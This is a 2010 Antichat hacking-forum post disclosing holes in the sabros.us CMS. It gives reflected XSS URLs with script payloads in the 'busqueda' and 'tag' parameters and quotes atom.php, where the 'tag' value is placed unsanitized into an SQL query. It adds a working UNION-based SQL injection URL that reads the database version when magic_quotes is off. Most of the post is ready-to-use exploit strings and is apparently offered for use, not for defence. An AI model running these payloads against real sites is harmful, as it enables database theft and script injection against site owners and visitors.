02.02.2010, 22:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
cms sabros.us
http://sourceforge.net/projects/sabrosus/files/latest
pXSS
http://localhost/sabrosus/index.php?busqueda=1<ScRiPt >alert(1212);</ScRiPt>
http://localhost/sabrosus/index.php?tag=1>"><ScRiPt>alert(1212);</ScRiPt>
------------
atom.php
PHP код:
if (isset($_GET["tag"])) {
$navegador = strtolower( $_SERVER['HTTP_USER_AGENT'] );
if (stristr($navegador, "opera") || stristr($navegador, "msie")) {
$tagtag = utf8_decode($_GET["tag"]);
} else {
$tagtag = $_GET["tag"];
}
}
$sqlStr = "SELECT DISTINCT link.* FROM ".$prefix."sabrosus as link, ".$prefix."tags as tag, ".$prefix."linktags as rel WHERE";
if(isset($tagtag)){
$sqlStr .= " (tag.tag LIKE '$tagtag') AND ";
}
$sqlStr .= " (tag.id = rel.tag_id AND rel.link_id = link.id_enlace) AND link.privado = 0 ORDER BY link.fecha DESC";
if(isset($cuantos)){
if($cuantos!='todos' && is_numeric($cuantos)){
$sqlStr .= " LIMIT $cuantos";
}
if($cuantos!='todos' && !is_numeric($cuantos)){
$sqlStr .= " LIMIT 10";
}
} else {
$sqlStr .= " LIMIT 10";
}
$result = mysql_query($sqlStr,$link);
SQL
mq=off
http://localhost/sabrosus/atom.php?tag=')+union+select+1,version(),3,4,5,6+--+
User-Agent=111
|
|
|